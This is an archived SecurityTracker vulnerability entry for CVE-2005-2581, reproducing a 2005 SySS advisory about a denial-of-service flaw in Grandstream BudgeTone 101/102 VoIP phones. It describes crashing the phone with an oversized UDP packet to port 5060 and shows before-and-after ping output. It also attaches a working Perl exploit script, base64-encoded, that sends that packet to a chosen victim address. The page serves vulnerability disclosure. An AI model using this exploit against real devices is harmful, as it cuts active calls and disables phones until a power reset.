SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Your Ad Here
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Device (VoIP/Phone/FAX)  >  BudgeTone SIP Phones Vendors:  Grandstream Networks
Grandstream BudgeTone 101/102 Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1014665
SecurityTracker URL:  http://securitytracker.com/id?1014665
CVE Reference:  CVE-2005-2581   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Aug 13 2005
Impact:  Denial of service via network
Exploit Included:  Yes  
Version(s): 101/102; Tested on firmware version 1.0.6.7
Description:  A vulnerability was reported in the Grandstream BudgeTone 101/102. A remote user can cause denial of service conditions.

A remote user can send a UDP packet that is more than 65534 bytes to port 5060 on the target device to cause the target device to crash. As a result, any active calls will be dropped, the display will not work, and the built-in web server will become unaccessible.

A power reset is required to return the device to normal operations.

A remote user can send a UDP packet that is exactly 65534 bytes to potentially cause the target device to reboot.

The vendor was notified on July 21, 2005.

Pierre Kroma of SySS GmbH reported this vulnerability.
Impact:  A remote user can cause the target device to crash.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.grandstream.com/ (Links to External Site)
Cause:  Boundary error, Exception handling error
Reported By:  Kroma Pierre <kroma@syss.de>
Message History:   None.

 Source Message Contents
Date:  Fri, 12 Aug 2005 14:27:05 +0200
From:  Kroma Pierre <kroma@syss.de>
Subject:  Grandstream Budge Tone 101/102 DoS Vulnerability

 
--Signature_Fri__12_Aug_2005_14_27_05_+0200_eUCiZFmOfHo=vh38
Content-Type: multipart/mixed;
 boundary=Multipart_Fri__12_Aug_2005_14_27_05_+0200_w+l8sZfQ.4cvwwgL

--Multipart_Fri__12_Aug_2005_14_27_05_+0200_w+l8sZfQ.4cvwwgL
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

- -------------------------------------------------------------------
SySS-Advisory: Grandstream Budge Tone 101/102 DoS Vulnerability
- -------------------------------------------------------------------

Problem discovered: 		July 	20th 2005
Vendor contacted: 		July 	21th 2005
Advisory will published on: 	August 	12th 2005

AUTHOR: 	Pierre Kroma (kroma@syss.de)
		SySS GmbH
		72070 Tuebingen / Germany
		Tel.: +49-7071-407856-0
Key fingerprint =3D 927A B13E 16F5 BBAB 8F17 75EB D8E1 A9A4 F257 4EEC

DEVICE:			Grandstream Budge Tone-101
			Grandstream Budge Tone-102
AFFECTED VERSIONS: 	perhaps all(?) <=3D 1.0.6.7 (firmware 1.0.6.7 tested)

EXPLOIT:		attached
VENDOR STATUS: 		informed
SEVERITY: 		medium
Remotely exploitable: 	yes

DESCRIPTION:
It is possible to initiate a D.o.S attack against this voip
(hardware-)phone. If you send an UDP packet greater than 65534 bytes=20
to port 5060 the device stops working:

- any active telephone call will be aborted.
- the display will show nothing / display freeze.
- the integrated HTTP-server won't be reachable any more.

To solve the problem, you must switch the phone off and on again.

If you send a packet of exactly 65534 bytes the device may reboot.
Smaller packets have no effect.

############################################################################
EXAMPLE:
Grandstream BT101/BT102 DoS
written by pierre kroma (kroma@syss.de)

ping the remote device xxx.xxx.xxx.xxx
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx) 56(84) bytes of data.
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3D1 ttl=3D250 time=3D0.479 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3D2 ttl=3D250 time=3D0.406 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3D3 ttl=3D250 time=3D0.404 ms

--- xxx.xxx.xxx.xxx ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2000ms
rtt min/avg/max/mdev =3D 0.404/0.429/0.479/0.042 ms

Wait ...

ping the remote device xxx.xxx.xxx.xxx again
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx) 56(84) bytes of data.

--- xxx.xxx.xxx.xxx ping statistics ---
3 packets transmitted, 0 received, 100% packet loss, time 1999ms
############################################################################

--Multipart_Fri__12_Aug_2005_14_27_05_+0200_w+l8sZfQ.4cvwwgL
Content-Type: application/x-perl; name=grandstream-DoS.pl
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=grandstream-DoS.pl

IyEvdXNyL2Jpbi9wZXJsCiMKdXNlIElPOjpTb2NrZXQ7CnVzZSBUZXJtOjpBTlNJQ29sb3I7Cgoj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIFUgUyBBIEcgRSAjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIwpzeXN0ZW0gKCJjbGVhciIpOwpwcmludCAiXG5HcmFuZHN0cmVhbSBC
VDEwMS9CVDEwMiBEb1NcbiI7CnByaW50ICJ3cml0dGVuIGJ5IHBpZXJyZSBrcm9tYSAoa3JvbWFc
QHN5c3MuZGUpXG5cbiI7CgppZiAoISRBUkdWWzJdKXsKcHJpbnQgcXF+ClVzYWdlOiBwZXJsIGdy
YW5kc3RyZWFtLURvUy5wbCAtcyA8aXAtYWRkcj4gPHVkcC1wb3J0PiB7LXIvLXN9CgoJPGlwLWFk
ZHI+ICA9IDstKQoJPHVkcC1wb3J0PiA9IDUwNjAKCgktciA9ICdyZWJvb3QnIAl0aGUgR3JhbmRz
dHJlYW0gQlQgMTAxLzEwMgoJLXMgPSAnc2h1dGRvd24nIHRoZSBHcmFuZHN0cmVhbSBCVCAxMDEv
MTAyCgp+OyBleGl0O30KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBEIEUgRiBJ
IE4gSSBUIEkgTyBOIFMjIyMjIyMjIyMjIyMjIyMjIyMjIwoKJHZpY3RpbSA9ICRBUkdWWzBdOwok
cG9ydCA9ICRBUkdWWzFdOwokb3B0aW9uID0gJEFSR1ZbMl07CgppZiAoICRvcHRpb24gPT0gJ3In
IHx8ICRvcHRpb24gPT0gJ1InICkKewkkcmVxdWVzdD0gJ2sneDY1NTM0O30KCmlmICggJG9wdGlv
biA9PSAncycgfHwgJG9wdGlvbiA9PSAnUycgKQp7CSRyZXF1ZXN0PSAncCd4NjU1MzU7fQplbHNl
CnsJcHJpbnQgIldyb25nIHBhcmFtZXRlciAtIHRyeSBpdCBhZ2FpbiI7CglleGl0Owp9CgoKIyBw
aW5nIHRoZSByZW1vdGUgZGV2aWNlCnByaW50IGNvbG9yICdib2xkIGJsdWUnOwpwcmludCAiXG5w
aW5nIHRoZSByZW1vdGUgZGV2aWNlICR2aWN0aW1cbiI7CnByaW50IGNvbG9yICdyZXNldCc7CnN5
c3RlbSgicGluZyAtYyAzICR2aWN0aW0iKTsKCnByaW50IGNvbG9yICdib2xkIHJlZCc7CnByaW50
ICJcbiBXYWl0IC4uLiBcblxuXG4iOwpwcmludCBjb2xvciAncmVzZXQnOwokc294ID0gSU86OlNv
Y2tldDo6SU5FVC0+bmV3KFByb3RvPT4idWRwIixQZWVyUG9ydD0+IiRwb3J0IixQZWVyQWRkcj0+
IiR2aWN0aW0iKTsKCnByaW50ICRzb3ggJHJlcXVlc3Q7CnNsZWVwIDE7CmNsb3NlICRzb3g7Cgoj
IHBpbmcgdGhlIHJlbW90ZSBkZXZpY2UKcHJpbnQgY29sb3IgJ2JvbGQgYmx1ZSc7CnByaW50ICJw
aW5nIHRoZSByZW1vdGUgZGV2aWNlICR2aWN0aW0gYWdhaW5cbiI7CnByaW50IGNvbG9yICdyZXNl
dCc7CnN5c3RlbSgicGluZyAtYyAzICR2aWN0aW0iKTsKCg==

--Multipart_Fri__12_Aug_2005_14_27_05_+0200_w+l8sZfQ.4cvwwgL--

--Signature_Fri__12_Aug_2005_14_27_05_+0200_eUCiZFmOfHo=vh38
Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----

iD8DBQFC/JWo2OGppPJXTuwRAnaqAKDZw6YBFmysNYjLpbXDRg5/QM5xBQCg+ybR
3JWDK/h2CLMULc/DbvIcE94=
=twH3
-----END PGP SIGNATURE-----

--Signature_Fri__12_Aug_2005_14_27_05_+0200_eUCiZFmOfHo=vh38--


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2007, SecurityGlobal.net LLC